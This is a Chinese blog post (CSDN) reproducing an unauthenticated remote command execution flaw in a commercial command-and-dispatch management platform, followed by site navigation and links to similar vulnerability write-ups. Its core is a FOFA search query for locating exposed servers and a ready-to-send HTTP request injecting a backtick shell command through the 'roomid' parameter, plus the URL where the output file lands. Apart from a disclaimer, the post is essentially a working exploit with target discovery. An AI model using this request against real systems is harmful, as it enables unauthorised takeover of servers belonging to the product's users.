【漏洞复现】福建科立讯通信有限公司指挥调度管理平台invite_one_member.php接口RCE

最新推荐文章于 2024-05-17 10:46:27 发布
最新推荐文章于 2024-05-17 10:46:27 发布
阅读量481 收藏 10
点赞数 9
分类专栏: 漏洞复现 文章标签: web安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45530380/article/details/135409162
版权

文章目录

免责声明

本文所涉及的任何技术、信息或工具,仅供学习和参考之用。请勿利用本文提供的信息从事任何违法活动或不当行为。任何因使用本文所提供的信息或工具而导致的损失、后果或不良影响,均由使用者个人承担责任,与本文作者无关。作者不对任何因使用本文信息或工具而产生的损失或后果承担任何责任。使用本文所提供的信息或工具即视为同意本免责声明,并承诺遵守相关法律法规和道德规范。

漏洞描述

福建科立讯通信有限公司指挥调度管理平台invite_one_member.php接口RCE。

资产测绘

FOFA:body="指挥调度管理平台"

漏洞复现

GET /api/client/audiobroadcast/invite_one_member.php?callee=1&roomid=`id>123321.txt` HTTP/1.1
Host: ip
Connection: close
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)

在这里插入图片描述

webshell:http://ip/api/client/audiobroadcast/123321.txt

新疆东坡肉
关注
  • 9
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
科立S780说明书
04-30
科立S780说明书
科立应急融合通信系统解决方案(1)(1)(2).docx
12-17
科立应急融合通信系统解决方案(1)(1)(2).docx
KSP3500s_V1.08.EXE
03-09
科立ksp3500驱动下载
利用Vulnhub复现漏洞 - Electron 远程命令执行漏洞(CVE-2018-1000006)
JiangBuLiu的博客
07-03 1484
Electron 远程命令执行漏洞(CVE-2018-1000006)Vulnhub官方复现教程漏洞原理复现漏洞启动环境漏洞复现 Vulnhub官方复现教程 https://github.com/vulhub/vulhub/blob/master/electron/CVE-2018-1000006/README.zh-cn.md 漏洞原理 Electron是由Github开发,用HTML,CSS和...
漏洞复现福建科立通信有限公司指挥调度管理平台invite2videoconf.php接口RCE漏洞
weixin_45530380的博客
01-05 518
【代码】【漏洞复现福建科立通信有限公司指挥调度管理平台invite2videoconf.php接口RCE漏洞
漏洞复现福建科立通信有限公司指挥调度管理平台invite_one_ptter.php接口RCE
weixin_45530380的博客
01-05 471
【代码】【漏洞复现福建科立通信有限公司指挥调度管理平台invite_one_ptter.php接口RCE
科立PT668写频软件.rar
10-24
科立对讲机PT668写频程序,适合用途广泛
科立DR550数字中转台详细介绍彩页
05-07
科立DR550对讲机数字中继DPMR双模兼容基站总台对讲机
科立PT8000 写频密码清除
04-27
科立PT8000 密码清除 400兆机器固件 需要编程器写入, 里面有2个文件,第一个文件数字文件名就是写频密码,第二个固件是没有写频密码直接可进入
漏洞复现福建科立通信-指挥调度平台-get-gis-fence-warning-sql注入
知黑而守白
01-18 132
福建科立通信指挥调度管理平台是一个专门针对通信行业的管理平台。该产品旨在提供高效的指挥调度管理解决方案,以帮助通信运营商或相关机构实现更好的运营效率和服务质量。该平台提供强大的指挥调度功能,可以实时监控和管理通信网络设备、维护人员和工作任务等。用户可以通过该平台发送指令、调度人员、分配任务,并即时获取现场反馈和报告。福建科立通信指挥调度平台 get-gis-fence-warning 接口处存在SQL注入漏洞
科立通信 - 指挥调度管理平台,uploadfile.php存在文件上传漏洞
weixin_62352348的博客
01-13 362
科立通信 - 指挥调度管理平台,uploadfile.php存在文件上传漏洞
地图 显示 动态轨迹_【对讲机的那点事】你了解公网对讲机的地图调度功能吗?...
weixin_39575410的博客
12-09 644
点击上面微信号关注我关注我哟定期推送对讲机行业资,华安捷对讲机公司的产品优惠等诸多优质内容,最接地气、重服务的对讲机行业微信平台!微信号:shuziduijiangjiID号:gh_778e0cd66ec0,关注我们妥妥没错!(广告合作:13051401525)公网对讲机以其丰富的应用功能占据对讲机的半壁江山,组呼、群呼、选呼、定位、电子围栏等功能让使用者得心应手,一机在手掌握所有...
福建科立通信 指挥调度管理平台多处RCE漏洞复现
0xSec
01-04 770
福建科立通信有限公司指挥调度管理平台vmonitor.phpinvite2videoconf.php、restcontroler.php接口处存在远程命令执行漏洞,未经身份认证的攻击者可通给该漏洞远程执行命令,写入后门文件可导致服务器失陷。
分布式任务调度平台XXL-JOB深度实战
lonelymanontheway的博客
08-27 1808
概述:简介,架构,数据表解释,安装启动; 实战:配置文件,配置类,API封装工具类,执行器(自动注册和手动注册对比),4种任务开发方式(基于API实现批量提交用户任务),批量修改任务失败告警人信息...
web安全之登录框渗透骚姿势,新思路
qq_47289634的博客
05-10 650
越权漏洞的挖掘大部分是通过对比两个用户的请求包以及响应包,来观察不同之处,有的时候替换一下响应包就直接越权,其中特别要关注的是uid,这里在挖掘逻辑漏洞和越权漏洞时建议使用burp中的compare模块进行两个数据包的比对,非常直观。width=500&height=100导致可以随意更改大小,配合脚本批量请求,很容易就会把带宽占满,造成dos攻击。不管漏洞挖掘还是挖SRC,登录框都是重点关注对象,什么漏洞都有可能出现,登录框也是框,见框就插就对了,说不定会有奇效。看到登录框,输入信息后,抓包。
了解网络安全行业内有哪些公司?
aheyor的博客
05-14 966
https://wenku.baidu.com/view/8de38c790440be1e650e52ea551810a6f424c80f?aggId=f2f58cc8e618964bcf84b9d528ea81c758f52ecc&fr=catalogMain_text_ernie_recall_feed_index%3Awk_recommend_main4&_wkts_=1715651666515&bdQuery=%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85
Web安全:企业如何抵御常见的网络攻击?
m0_66326520的博客
05-16 717
针对网站的攻击有多种形式,攻击者既可以是业余黑客,也会是协同作战的职业黑客团伙。最关键的一条建议,就是在创建或运营网站时不要跳过安全功能,因为跳过安全设置可能会造成严重后果。虽然不可能完全消除网站攻击风险,但你至少可以缓解遭攻击的可能性和攻击后果的严重性。遭受攻击后,不仅需要及时的响应处置还需要避免同类事件的发生,因此事后的复盘分析尤为重要,做好安全防护才是最高效的网络攻击解决方案。
网络安全】Linux 应急响应-溯源-系统日志排查知识点
最新发布
weixin_43822401的博客
05-17 347
编辑或;
科立pt8000-03写频线
01-28
科立pt8000-03写频线是一种用于通信设备中的高性能写频线。该写频线采用先进的技术和材料,具有优良的信号传输性能和抗干扰能力。它适用于各种频率的通信设备,能够稳定传输信号并保持通信质量。 科立pt8000-03写频线采用高纯度的铜线材和精密的制造工艺,确保信号传输的稳定性和可靠性。其外层绝缘材料采用特殊的材质,具有良好的耐磨损和耐高温性能,能够保护内部导线不受外界环境的影响。 写频线是通信设备中的重要部件,对于信号传输和通信质量起着关键作用。科立pt8000-03写频线经过精心设计和优化,能够最大程度地减小信号衰减和干扰,保证通信设备的稳定运行和优质通信。 除此之外,科立pt8000-03写频线还具有良好的机械强度和耐用性,能够满足通信设备在不同环境下的使用需求。它还具有易安装、易维护的特点,能够为用户提供便利的使用体验。 总之,科立pt8000-03写频线是一款性能优越、质量可靠的通信设备配件,能够满足各类通信设备对于信号传输的要求,是通信行业中的重要产品之一。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值